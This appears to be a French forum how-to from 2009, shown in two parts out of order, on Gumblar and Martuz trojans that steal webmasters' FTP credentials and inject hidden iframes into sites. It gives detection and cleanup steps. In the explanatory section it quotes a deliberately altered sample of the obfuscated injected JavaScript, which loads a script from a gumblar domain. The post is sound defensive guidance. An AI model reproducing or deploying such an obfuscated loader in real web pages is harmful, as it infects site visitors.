http://notepad-plus.sourceforge.net/uk/site.htm

Il y a aussi (merci à cbfr) File Seeker :
http://www.softpedia.com/get/System/...e-Seeker.shtml

Dans les deux cas, toutefois, il faut avoir les fichiers sur son ordinateur Windows pour pouvoir les explorer. (Donc éventuellement les recopier depuis le FTP.)



Voilà, c'est résumé () mais j'espère que ça a été utile.



Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to permissions index


Edit:
- 4 août 2009, ajout des informations sur les logiciels permettant la recherche sur fichiers multiples.[
- 22 août 2009, ajout d'information sur les caches des navigateurs, les pages mises en cache sur le FTP par les CMS, forums, etc., la sécurité par modification des droits sur les fichiers et dossiers, usage de clients FTP Linux, divers petits changements
- Septembre 2009, modifications mineures pour souligner l'extensions des risques.
- 6 octobre 2009, ajout de l'information "Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés
"

chbj
21/07/2009, 16h53
Attaques Sites Web par Iframes (et similaires) :
Problèmes et Solutions (Gumblar, Martuz, etc.)

Ce post (en 2 parties, à cause des limites du forum) explique comment de nombreux sites Web peuvent voir le code de leur pages modifié par des systèmes viraux ("virus") malveillants qui y incluent des connections cachées vers des sites également malveillants.

Ces systèmes viraux de type « trojans » (« cheval de Troie ») sont installés sur les PC des webmasters et détectent les codes FTP pour les utiliser et permettre la modification des pages web qui deviendront à leur tour des vecteurs de contagion.

Les contagions connues jusqu’ici ont été effectuées par le biais de versions anciennes (mais très utilisées) des logiciels Adobe Reader (PDF Reader) pour la lecture de fichiers au format PDF, et Adobe Flash Player pour la lecture de fichiers au format Flash. Mais des failles d’autres logiciels peuvent évidemment être utilisés.

Des solutions et méthodologies pour faire face à ces attaques sont proposées.


Introduction :

Tout spécialement depuis mai 2009, mais également auparavant pour une moindre part, des webmasters ont vu des lignes de code étranges apparaître dans leur pages web, et celles-ci se connecter à des sites hautement suspects, de manière invisible pour l'utilisateur ordinaire.

Souvent, les webmasters eux-mêmes ne réalisent le problème que par hasard, en éditant un fichier par exemple.

Typiquement, la forme la plus banale du code malicieux introduit ressemble plus ou moins à ceci :
Code:
Un iframe est, en termes courants, une sorte de cadre sur une page web, cadre qui connecte directement cette page web à une autre, faisant apparaître cette autre page dans le cadre. Mais l’iframe peut être formaté pour être invisible !

Bien que très pratique, la fonction iframe n'offre aucune sécurité pour l'utilisateur final qui se trouve connecté -parfois sans le savoir- à un autre site/page presque comme s'il s'y était connecté directement. Si l'autre site/page est malveillant ou simplement mal sécurisé, les conséquences peuvent être graves. (Evidemment, si l'autre site/page est sécurisé et bien contrôlé, par exemple en appartenant au même webmaster, ce problème ne se pose pas.). Pour ces raisons, l’usage de l’iframe n’est pas recommandé.

Pour complique les choses, depuis mai 2009, des codes malicieux beaucoup plus complexes et furtifs ont fait leur apparition et sont extrêmement difficiles à détecter sur des pages un tant soit peu sophistiquées.

Par exemple (code volontairement altéré avec « …… » et des parties supprimées) :
Code:
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6 …………… "65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff ………………………………  3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
[Note pour les programmeurs : la plupart du temps, la fonction n’a pas de nom. Elle est anonyme et s’auto-appelle (self-invoking)]

Ces attaques sont l’œuvre de variantes du virus de type "trojan" Gumblar (du nom du site -aujourd'hui disparu- vers lequel il dirigeait l'iframe), devenu par la suite Martuz (plus difficile à détecter car cachant mieux les URL malicieuses), et ayant, comme on vient de le dire, encore évolué depuis. (De pire en pire.)


Principe de la contagion (en très résumé) :

Ces trojans utilisent des faiblesses de certains logiciels : Adobe Reader (aussi appelé PDF Reader, Acrobat Reader), et Adobe Flash Player. (A noter que rien n'empêche théoriquement d'utiliser des faiblesses d'autres logiciels similaires.)

La contamination s'effectue donc la plupart du temps par l'intermédiaire de ces logiciels par les fichiers qu'ils téléchargent / jouent.

Une fois le PC contaminé, il va à son tour tenter de propager la contagion de la manière suivante : il recherche des codes FTP présents sur l'ordinateur, et les utilise pour placer l'iframe malicieux sur les sites accessibles par le FTP. Ces sites contamineront d'autres PC, et ainsi de suite.

La méthode est de plus en plus sophistiquée: par exemple, comparer (sites en anglais) :
http://blog.unmaskparasites.com/2009...jected-script/
http://blog.unmaskparasites.com/2009...mblar-exploit/

Les pages web affectées sont le plus souvent les pages du type index.php, index.htm, index.html, etc. (Ceci nous permettra de proposer plus loin une méthode de détection de la contagion.) Mais toute page peut être affectée (y compris si le virus fait une « erreur »). Les « templates » ou autres fichiers servant à générer des pages web dynamiques (forums, CMS, Blogs, wikis,…) peuvent également être contaminés, et le sont désomais de plus en plus.



Résolution :

1) Pour TOUS les PC susceptibles d'être contaminés, même si on pense qu'il ne le sont pas :
[INDENT]
- Videz les caches de votre navigateur quand vous nettoyez votre système ou simplement suspectez une attaque. Videz-les avant de commencer un examen ou un nettoyage ; videz-les après également ; et vides-les plusieurs fois par sécurité pendant les opérations et systématiquement si vous pensez être passé sur une page contaminée.

- Télécharger les dernières versions de Adobe Reader et Adobe Flash Player, de préférence sur une machine sûre. (Il se peut que d'autres logiciels soient aujourd'hui en cause, mais il faut bien commencer par ce qui est connu !)

- Désinstaller totalement Adobe Acrobat Reader et Adobe Flash Player sur les PC.

- Mettre à jour ses anti-virus. (Il se trouve que l'anti-virus AVAST -même la version gratuite- a été le premier capable de détecter et éradiquer Gumblar en mai dernier, mais cela aurait pu être un autre produit : un anti-virus ne vaut que ce que vaut son actualisation et la rapidité de celle-ci.)
Il peut être souhaitable, dans les cas extrêmes, de lancer l'antivirus à partir d'un CD-ROM bootable propre mais normalement cela n'est pas nécessaire avec cette famille de virus.

- Lancer un anti-virus (à jour ! ) et faire un scan complet.

- Supprimer autant que possible tous les fichiers inutiles de votre PC

- Ensuite installer les dernières versions de Adobe Acrobat Reader et Adobe Flash Player[

- Profitez-en pour mettre à jour vos autres plug-ins, add-ons, etc.
Voir aussi plus bas: "Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés"
/INDENT]


2) Sur TOUS les sites pour lesquels vous avez des accès FTP, même si vous pensez qu'ils ne sont pas contaminés :


-Restaurer à partir d'une sauvegarde saine, ou générer les pages à nouveau. Et changer vos codes FTP (au moins le mot de passe).
Sinon, sans fichiers propres, voilà la galère :

- Changer vos codes FTP (au moins le mot de passe)

- Avant de nettoyer votre site, videz le(s) cache(s) de vos sites web si ceux-ci mettent des pages en cache ! (C'est normalement le cas sur CMS, blogs, forums, wikis, etc.)Et n'oubliez pas le pages statiques générées par certains add-ons de CMS pour se substituer aux pages dynamique quand il n'est pas nécessaire que la page soit recréée à chaque fois.

- Rechercher le terme "iframe" dans toutes les pages. (OUi, c'est très pénible.)
Pour des logiciels permettant la recherche sur fichiers multiples, voire note à la fin du second messages de ce How-To.

- Rechercher aussi le terme "iframe" dans tous les templates (ou autre terminologie) utilisés par vos Forums, CMS, Blogs, Portails, etc. pour créer les pages dynamiques.

- Vérifier si l'usage de l'iframe est légitime ou non (normalement un codeur ne pas pas utiliser d'iframe dans son travail sauf s'il est totalement obligé de le faire)

- Supprimer les lignes de codes se rapportant à l'iframe illégitime. Attention, plus le virus est malin, plus cette opération peut être difficile. (Par exemple, s'il a utilisé plusieurs lignes d'instructions pour produire le même effet que la ligne de type classique citée plus haut.)

- Faire de même avec "script src=", pour les Martuz-like
(Voir http://blog.unmaskparasites.com/2009...mblar-exploit/ )

- Faire de même avec " “(function(“ " et éventuellement d'autres choses (et là ça peut être l'enfer).
Pour un descriptif complet des scripts, voir :
http://blog.unmaskparasites.com/2009...jected-script/
http://blog.unmaskparasites.com/2009...mblar-exploit/

- Faire évidemment un nouveau backup du site. Et vérifier que les anciens backups ne sont pas contaminés !

- Il peut être souhaitable de lancer des recherches sur les chaînes de caractères suspectes pour déceler du code mieux dissimulé, par exemple sur "visibility: hidden", voire, si l'on est réellement inquiet sur "http://" et vérifier les URL... ce qui sera évidemment pénible.


Demander à toutes les personnes ayant possédé les codes de vos FTP qu'elles fassent impérativement la même chose sur TOUS leurs PC et TOUS leurs propres sites !




Suite dans le post ci-dessous


Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to permissions index